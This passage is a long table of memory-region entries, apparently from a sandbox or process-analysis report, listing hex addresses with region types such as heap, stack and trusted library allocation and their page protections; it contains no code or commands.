trusted library allocation
|
page read and write
|
||
44D297E000
|
stack
|
page read and write
|
||
7FF887A10000
|
trusted library allocation
|
page read and write
|
||
1CB495B0000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF57F0000
|
direct allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
27474F7D000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF58B1000
|
heap
|
page read and write
|
||
21B0000
|
heap
|
page read and write
|
||
27474C10000
|
heap
|
page read and write
|
||
22BF85A5000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7C40000
|
heap
|
page read and write
|
||
22BF7C57000
|
heap
|
page read and write
|
||
22BF7A00000
|
heap
|
page read and write
|
||
2971000
|
heap
|
page read and write
|
||
1B530000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
2F6E000
|
trusted library allocation
|
page read and write
|
||
7FF887DA0000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
26D5000
|
trusted library allocation
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
7FF78268F000
|
direct allocation
|
page execute and read and write
|
||
23D20DE0000
|
heap
|
page readonly
|
||
1B670000
|
trusted library allocation
|
page read and write
|
||
1B510000
|
trusted library allocation
|
page read and write
|
||
1B480000
|
trusted library allocation
|
page read and write
|
||
7FF887C70000
|
trusted library allocation
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
1BC60000
|
trusted library allocation
|
page read and write
|
||
23D22AB1000
|
heap
|
page read and write
|
||
1CB4C877000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1CB49570000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B8B0000
|
trusted library allocation
|
page read and write
|
||
22BF7C3D000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
1B010641000
|
trusted library allocation
|
page read and write
|
||
1CB4C7CD000
|
trusted library allocation
|
page read and write
|
||
7FF887A52000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
1B018BD3000
|
heap
|
page read and write
|
||
23D22EE0000
|
heap
|
page read and write
|
||
23D22AB8000
|
heap
|
page read and write
|
||
1B473000
|
trusted library allocation
|
page read and write
|
||
7FF7823F0000
|
direct allocation
|
page execute and read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1CB49478000
|
heap
|
page read and write
|
||
1B7B0000
|
trusted library allocation
|
page read and write
|
||
59CB000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
22BF7A1F000
|
heap
|
page read and write
|
||
CEF000
|
heap
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1CB49430000
|
heap
|
page read and write
|
||
22BF7C47000
|
heap
|
page read and write
|
||
22BF85F4000
|
heap
|
page read and write
|
||
1CB63580000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF71F0000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
1B5E0000
|
trusted library allocation
|
page read and write
|
||
22BF8513000
|
heap
|
page read and write
|
||
44D390B000
|
stack
|
page read and write
|
||
1AA77000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
1B001190000
|
trusted library allocation
|
page read and write
|
||
2910000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF58B0000
|
heap
|
page read and write
|
||
44D27FD000
|
stack
|
page read and write
|
||
2749000
|
trusted library allocation
|
page read and write
|
||
2745DFBF000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1B9E0000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2745C400000
|
heap
|
page execute and read and write
|
||
1AAD0000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
22BF85AC000
|
heap
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1B4C0000
|
trusted library allocation
|
page read and write
|
||
22BF7E34000
|
unkown
|
page read and write
|
||
7FF887A44000
|
trusted library allocation
|
page read and write
|
||
2263000
|
heap
|
page read and write
|
||
7FF782541000
|
direct allocation
|
page execute and read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF85AC000
|
heap
|
page read and write
|
||
22BF58AC000
|
heap
|
page read and write
|
||
CBB000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
23D229E1000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B07E2AA000
|
heap
|
page read and write
|
||
1B018BD0000
|
heap
|
page read and write
|
||
22BF8511000
|
heap
|
page read and write
|
||
44D388D000
|
stack
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
1B490000
|
trusted library allocation
|
page read and write
|
||
2747000
|
trusted library allocation
|
page read and write
|
||
22BF85F8000
|
heap
|
page read and write
|
||
2745A846000
|
heap
|
page read and write
|
||
4FB000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C40000
|
heap
|
page read and write
|
||
27474CEE000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
2A5A9188000
|
heap
|
page read and write
|
||
1B00130A000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
2615000
|
heap
|
page read and write
|
||
1CB49645000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF887E70000
|
trusted library allocation
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
22BF7C2A000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
27474BE4000
|
heap
|
page read and write
|
||
CD8000
|
heap
|
page read and write
|
||
22BF71F0000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
7FF887A84000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
2976000
|
heap
|
page read and write
|
||
59E000
|
heap
|
page read and write
|
||
7FF887A40000
|
trusted library allocation
|
page read and write
|
||
2D93000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B890000
|
trusted library allocation
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1B010371000
|
trusted library allocation
|
page read and write
|
||
1AA63000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B001E06000
|
trusted library allocation
|
page read and write
|
||
E445B44000
|
stack
|
page read and write
|
||
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
1ADD4000
|
heap
|
page read and write
|
||
22BF852E000
|
heap
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
10EE000
|
heap
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
594C000
|
heap
|
page read and write
|
||
1B5F0000
|
trusted library allocation
|
page read and write
|
||
1ADDA000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7AA4000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
22BF8520000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF58AC000
|
heap
|
page read and write
|
||
1ACFF000
|
heap
|
page read and write
|
||
1B018DFA000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7DC0000
|
trusted library allocation
|
page read and write
|
||
22BF8554000
|
heap
|
page read and write
|
||
23D22ADE000
|
heap
|
page read and write
|
||
7FF887D40000
|
trusted library allocation
|
page read and write
|
||
44D29F9000
|
stack
|
page read and write
|
||
69F000
|
unkown
|
page read and write
|
||
D38000
|
heap
|
page read and write
|
||
21A0000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF7AAF000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1AADAFA8000
|
heap
|
page read and write
|
||
1B61A000
|
stack
|
page read and write
|
||
7FF887C60000
|
trusted library allocation
|
page read and write
|
||
7FF9080E0000
|
direct allocation
|
page execute and read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
7FF887D90000
|
trusted library allocation
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
2DF3000
|
trusted library allocation
|
page read and write
|
||
1B001D60000
|
trusted library allocation
|
page read and write
|
||
1CB4948E000
|
heap
|
page read and write
|
||
1B7A0000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AE90000
|
trusted library allocation
|
page read and write
|
||
7FF7178DF000
|
unkown
|
page readonly
|
||
979000
|
unkown
|
page readonly
|
||
22BF851C000
|
heap
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
1BC60000
|
trusted library allocation
|
page read and write
|
||
22BF589E000
|
heap
|
page read and write
|
||
22BF8533000
|
heap
|
page read and write
|
||
1C380000
|
heap
|
page read and write
|
||
22BF8510000
|
heap
|
page read and write
|
||
1AADAE69000
|
unkown
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
24A2C848000
|
heap
|
page read and write
|
||
22BF7AAF000
|
heap
|
page read and write
|
||
1B4CE000
|
stack
|
page read and write
|
||
24A2E341000
|
heap
|
page read and write
|
||
22BF7C0D000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
1CB49530000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF887CB0000
|
trusted library allocation
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
1AB73000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
22BF7A22000
|
heap
|
page read and write
|
||
7FF887C52000
|
trusted library allocation
|
page read and write
|
||
1CB49330000
|
heap
|
page read and write
|
||
22BF7C6D000
|
heap
|
page read and write
|
||
2DAE000
|
stack
|
page read and write
|
||
1BAB0000
|
trusted library allocation
|
page read and write
|
||
7FF887ADC000
|
trusted library allocation
|
page execute and read and write
|
||
1AEE0000
|
trusted library allocation
|
page read and write
|
||
22BF7BB7000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
23D229A0000
|
heap
|
page read and write
|
||
F25DA7D000
|
stack
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF8511000
|
heap
|
page read and write
|
||
7FF887AC0000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1AA53000
|
trusted library allocation
|
page read and write
|
||
59FF000
|
heap
|
page read and write
|
||
7DF431881000
|
unkown
|
page execute read
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
7DF431880000
|
unkown
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
2DB1000
|
trusted library allocation
|
page read and write
|
||
1B0186CA000
|
heap
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AAB0000
|
trusted library allocation
|
page read and write
|
||
1B781000
|
direct allocation
|
page execute and read and write
|
||
1B000050000
|
heap
|
page readonly
|
||
22BF859B000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
1B780000
|
trusted library allocation
|
page read and write
|
||
22BF5887000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
7FF887E30000
|
trusted library allocation
|
page read and write
|
||
897000
|
unkown
|
page write copy
|
||
1B018B68000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF71F0000
|
direct allocation
|
page execute and read and write
|
||
1CB4C071000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1CB63550000
|
heap
|
page execute and read and write
|
||
1B790000
|
trusted library allocation
|
page read and write
|
||
7FF887D80000
|
trusted library allocation
|
page read and write
|
||
1B48B000
|
trusted library allocation
|
page read and write
|
||
22BF85C7000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
1BA40000
|
trusted library allocation
|
page read and write
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
CE6000
|
heap
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
22BF8529000
|
heap
|
page read and write
|
||
274747CB000
|
heap
|
page read and write
|
||
22BF58B0000
|
heap
|
page read and write
|
||
22BF85E2000
|
heap
|
page read and write
|
||
1AC94000
|
trusted library allocation
|
page read and write
|
||
7FF887A24000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AC8C000
|
heap
|
page read and write
|
||
1CB634FB000
|
heap
|
page read and write
|
||
1B870000
|
trusted library allocation
|
page read and write
|
||
269C000
|
trusted library allocation
|
page read and write
|
||
22BF8022000
|
unkown
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
23D20D01000
|
unkown
|
page execute read
|
||
1B4F0000
|
trusted library allocation
|
page read and write
|
||
1B4A0000
|
trusted library allocation
|
page read and write
|
||
123C6000
|
trusted library allocation
|
page read and write
|
||
1AC20000
|
trusted library allocation
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
1ABA5000
|
trusted library allocation
|
page read and write
|
||
5A0A000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B8B0000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1E879EAB000
|
heap
|
page read and write
|
||
7FF8DF02A000
|
unkown
|
page write copy
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
27474AA0000
|
trusted library allocation
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
22BF7B4E000
|
heap
|
page read and write
|
||
7FF887A3B000
|
trusted library allocation
|
page read and write
|
||
2B24000
|
heap
|
page read and write
|
||
1B940000
|
trusted library allocation
|
page read and write
|
||
27474C85000
|
heap
|
page read and write
|
||
55C000
|
heap
|
page read and write
|
||
22BF7C33000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1B790000
|
trusted library allocation
|
page read and write
|
||
5978000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AC60000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
24A2CA60000
|
heap
|
page read and write
|
||
A708C7A000
|
stack
|
page read and write
|
||
7FF887EB0000
|
trusted library allocation
|
page read and write
|
||
7DF4EA5D0000
|
trusted library allocation
|
page execute and read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C71000
|
heap
|
page read and write
|
||
A709B8E000
|
stack
|
page read and write
|
||
1ADD0000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF7C57000
|
heap
|
page read and write
|
||
274748E0000
|
heap
|
page execute and read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B590000
|
heap
|
page read and write
|
||
1B018C1B000
|
heap
|
page read and write
|
||
7FF887CF0000
|
trusted library allocation
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
1AEA0000
|
trusted library allocation
|
page read and write
|
||
1CB4C892000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1BA66000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
2745DF84000
|
trusted library allocation
|
page read and write
|
||
7FF887E63000
|
trusted library allocation
|
page read and write
|
||
2590000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
1BC70000
|
trusted library allocation
|
page read and write
|
||
1AA63000
|
trusted library allocation
|
page read and write
|
||
1B573000
|
trusted library allocation
|
page read and write
|
||
23D210D6000
|
heap
|
page read and write
|
||
22BF79FA000
|
heap
|
page read and write
|
||
1B9D0000
|
trusted library allocation
|
page read and write
|
||
E445E7F000
|
stack
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7AAC000
|
heap
|
page read and write
|
||
1EAE07A000
|
stack
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
2900000
|
trusted library allocation
|
page read and write
|
||
7FF7177BB000
|
unkown
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF7D80000
|
unkown
|
page read and write
|
||
2350000
|
trusted library section
|
page read and write
|
||
2A5AAD02000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
7FF887CF0000
|
trusted library allocation
|
page read and write
|
||
24A2E240000
|
heap
|
page read and write
|
||
22BF7A06000
|
heap
|
page read and write
|
||
A709C89000
|
stack
|
page read and write
|
||
22BF8524000
|
heap
|
page read and write
|
||
7FF887E80000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1BA40000
|
trusted library allocation
|
page read and write
|
||
5965000
|
heap
|
page read and write
|
||
1B590000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page readonly
|
||
22BF852A000
|
heap
|
page read and write
|
||
1BA00000
|
trusted library allocation
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1BAA2000
|
trusted library allocation
|
page read and write
|
||
27474B09000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C40000
|
heap
|
page read and write
|
||
1B860000
|
trusted library allocation
|
page read and write
|
||
652C000
|
stack
|
page read and write
|
||
7FF887A30000
|
trusted library allocation
|
page read and write
|
||
1B780000
|
direct allocation
|
page execute and read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
7FF887C57000
|
trusted library allocation
|
page read and write
|
||
22BF7A3F000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B580000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7A22000
|
heap
|
page read and write
|
||
1AB13000
|
trusted library allocation
|
page read and write
|
||
22BF7A14000
|
heap
|
page read and write
|
||
26DF000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
612C000
|
stack
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
1AEE0000
|
trusted library allocation
|
page read and write
|
||
7FF887A7D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887B60000
|
trusted library allocation
|
page execute and read and write
|
||
22BF8509000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
2610000
|
heap
|
page read and write
|
||
1BB10000
|
trusted library allocation
|
page read and write
|
||
22BF86FB000
|
heap
|
page read and write
|
||
B8E000
|
stack
|
page read and write
|
||
1BBF0000
|
trusted library allocation
|
page read and write
|
||
22BF7A65000
|
heap
|
page read and write
|
||
1CB4AF50000
|
heap
|
page read and write
|
||
1BC72000
|
direct allocation
|
page execute and read and write
|
||
1B018B62000
|
heap
|
page read and write
|
||
22BF8540000
|
heap
|
page read and write
|
||
1BAE0000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
7FF887C30000
|
trusted library allocation
|
page read and write
|
||
7FF887DB0000
|
trusted library allocation
|
page read and write
|
||
22BF7E19000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF854C000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
7FF887A9D000
|
trusted library allocation
|
page execute and read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B650000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF7AAF000
|
heap
|
page read and write
|
||
7FF887D20000
|
trusted library allocation
|
page read and write
|
||
22BF8512000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
22BF7AAC000
|
heap
|
page read and write
|
||
7FF887A54000
|
trusted library allocation
|
page read and write
|
||
22BF7A1E000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1BAC0000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AB30000
|
trusted library allocation
|
page read and write
|
||
1AADAF80000
|
heap
|
page read and write
|
||
7DF431881000
|
unkown
|
page execute read
|
||
2A5A9040000
|
heap
|
page read and write
|
||
1B07E1C0000
|
heap
|
page read and write
|
||
2655000
|
heap
|
page read and write
|
||
7FF887C10000
|
trusted library allocation
|
page execute and read and write
|
||
1B0010B2000
|
trusted library allocation
|
page read and write
|
||
7FF887A5B000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
24A2CA70000
|
heap
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
7FF887A8B000
|
trusted library allocation
|
page read and write
|
||
1B740000
|
trusted library allocation
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
22BF7AAF000
|
heap
|
page read and write
|
||
22BF8523000
|
heap
|
page read and write
|
||
1AA70000
|
remote allocation
|
page read and write
|
||
23D20D00000
|
unkown
|
page read and write
|
||
1B680000
|
trusted library allocation
|
page read and write
|
||
2D38000
|
heap
|
page read and write
|
||
1B5A0000
|
trusted library allocation
|
page read and write
|
||
1BAF0000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AC73000
|
heap
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
7FF887D70000
|
trusted library allocation
|
page read and write
|
||
22BF79FA000
|
heap
|
page read and write
|
||
1030000
|
heap
|
page read and write
|
||
264E000
|
heap
|
page read and write
|
||
62D336D000
|
stack
|
page read and write
|
||
22BF7A29000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1B450000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
5D1000
|
heap
|
page read and write
|
||
1AC8F000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
21E6000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
7FF887D20000
|
trusted library allocation
|
page read and write
|
||
7FF7178DC000
|
unkown
|
page write copy
|
||
7FF887D74000
|
trusted library allocation
|
page read and write
|
||
22BF58BC000
|
heap
|
page read and write
|
||
1BAA0000
|
trusted library allocation
|
page read and write
|
||
22BF85F8000
|
heap
|
page read and write
|
||
1B81E000
|
stack
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
22BF8523000
|
heap
|
page read and write
|
||
7FF887E2C000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7C3D000
|
heap
|
page read and write
|
||
7FF887D80000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
2745DD7B000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7A18000
|
heap
|
page read and write
|
||
1AA73000
|
trusted library allocation
|
page read and write
|
||
274748E6000
|
heap
|
page execute and read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B07E2AF000
|
heap
|
page read and write
|
||
2DA0000
|
heap
|
page execute and read and write
|
||
7FF887A6D000
|
trusted library allocation
|
page execute and read and write
|
||
1BB60000
|
trusted library allocation
|
page read and write
|
||
22BF8584000
|
heap
|
page read and write
|
||
22BF5740000
|
unkown
|
page execute and read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
7FF887A70000
|
trusted library allocation
|
page read and write
|
||
F25DAFC000
|
stack
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
22BF71F0000
|
direct allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
1B8F0000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF7FD7000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB47000
|
trusted library allocation
|
page read and write
|
||
22BF7A3D000
|
heap
|
page read and write
|
||
1AF32000
|
heap
|
page read and write
|
||
2745D5F9000
|
trusted library allocation
|
page read and write
|
||
A708DBE000
|
stack
|
page read and write
|
||
22BF7C1B000
|
heap
|
page read and write
|
||
22BF7BA4000
|
heap
|
page read and write
|
||
2746C431000
|
trusted library allocation
|
page read and write
|
||
1BBA9000
|
trusted library allocation
|
page read and write
|
||
1AD0A000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2C83000
|
heap
|
page read and write
|
||
594E000
|
heap
|
page read and write
|
||
102000
|
stack
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
24A2C860000
|
heap
|
page read and write
|
||
1B4E0000
|
trusted library allocation
|
page read and write
|
||
1B4D0000
|
trusted library allocation
|
page read and write
|
||
22BF7A04000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
735000
|
unkown
|
page read and write
|
||
7FF887A22000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1B0187D0000
|
heap
|
page execute and read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1BC80000
|
trusted library allocation
|
page read and write
|
||
2B45000
|
heap
|
page read and write
|
||
7FF887E80000
|
trusted library allocation
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
D44000
|
heap
|
page read and write
|
||
22BF852E000
|
heap
|
page read and write
|
||
22BF7C08000
|
heap
|
page read and write
|
||
1BB00000
|
trusted library allocation
|
page read and write
|
||
2A5A9124000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
7FF887DC4000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
